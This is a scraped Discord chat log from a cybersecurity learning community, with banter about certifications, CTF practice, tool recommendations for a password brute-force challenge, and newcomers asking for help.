Me: "Do you like feet?"
Rando:
Me: "Well do you?"

blazing granite
sick lance
#

@uneven hedge please don't post e-mails in this server, if you think it's spam, just ignore it.

frail locust
#

I am interested in Security Analyst Level 1 (SLA1) I saw that you can take exame for free if you have Security+ and Cysa+ is that true?

uneven hedge
#

Bruh moment

boreal scarab
#

Got the interaction wrong, got the texts though

#

It was very... religious type shit

frail locust
# sick lance BTL1 and/or CySa+.

In that case, I must be reading it wrong. Where do I find that information on the website? I can't seem to find it. I think I'm having a tunnel vision

plush forge
#

Argggg. Script- either do as I demand, give me a proper error, or perish

whole creek
#

sup

plush forge
#

My code isn't working :(

sick lance
#

Which code?

sturdy pike
plush forge
#

Please never compare me to a Harry Potter character ever again

plush forge
# sick lance Which code?

Trying to make a JavaScript brute forcer. Because This site has some quirks that make conventional tools useless, and I'm not running four thousand passwords through burp suite community edition

sick lance
#

Probably be faster with python.

sturdy pike
plush forge
#

how

sick lance
#

You'd probably be finished by now, since you can't get js to work. 😄

naive violet
#

Also... JS? Why tho?

#

Unless you're running it in the page in which case, also why?

plush forge
plush forge
naive violet
sturdy pike
timber nova
#

ffuf is good at multithreading

sick lance
#

I'd rather use ZAP than FFuF for passwords though.

timber nova
#

why?

plush forge
sturdy pike
#

@sick lance Are there any online degrees on cybersec?

whole yew
sick lance
plush forge
#

oh good, now my target webiste is refusing to load. (not in a bugged way just in a slow way)

sick lance
#

I see the cult grows grows for a member who isn't even here.

sturdy pike
sturdy pike
sick lance
#

lol.

#

Fluff is very much a he.

sturdy pike
#

Well, who am I to judge

plush forge
#

on the one hand, this challenge is making me very annoyed. on the other, taht sjsut makes me want to solve it more

#

as soon as my vm stops being slow

sick lance
blazing granite
sick lance
sturdy pike
#

Can you tell me about the online degrees/courses if there are any?

sick lance
#

I only know of OpenUniversity, which may be UK only, I don't know.

blazing granite
plush forge
#

hmf. i think i should put this ctf aside for noew

sturdy pike
#

Do you wanna join aswell?

#

Scrubz | Fluff Clan

sick lance
#

No thank you. 😄

whole gazelle
#

who is fluff?

sick lance
#

FluffMe is an old Community member, mentor and moderator.

quick blaze
#

@sturdy pike whats fluff clan? 🤔

frail locust
twin ridgeBOT
#

Gave +1 Rep to @sick lance (current: #2 - 3494)

leaden marsh
#

I will study tryhackme after the crouse

boreal scarab
leaden marsh
#

I take crouse which is called offensive securitu

#

Secueity

sick lance
whole yew
#

🤷‍♂️

whole yew
#

Not...really?

quick blaze
sick lance
#

I finally have security onion doing what I want it to do.

whole yew
#

fluff's a cool dude but I don't get the idolization

sick lance
#

That was an annoying week.

quick blaze
whole yew
#

unknown to me

#

it's not a thing i try to understand

grizzled wing
#

join the veggiebox club

sick lance
#

Can you remove the image?

quick blaze
sturdy pike
grizzled wing
#

pass

sturdy pike
grizzled wing
#

Sue

sturdy pike
sturdy pike
grizzled wing
#

ls -d */

eternal timber
sick lance
sturdy pike
#

For me to give you nitro?

sick lance
#

There is a link. 😄

frail locust
fervent cove
#

AV Evasion: Shellcode room decided to remind me of the pain

rapid merlin
fervent cove
#

The quadfather

devout condor
#

Thanks for that recommendation, just finished, had a lot of fun and learned a lot

twin ridgeBOT
#

Gave +1 Rep to @half girder (current: #136 - 59)

eternal timber
echo mulch
#

hello

#

I'm new here

#

and I want to start learning

#

what first?

exotic geode
#

hi, in my kali vm i cant ping the servers i started on thm

#

any tips?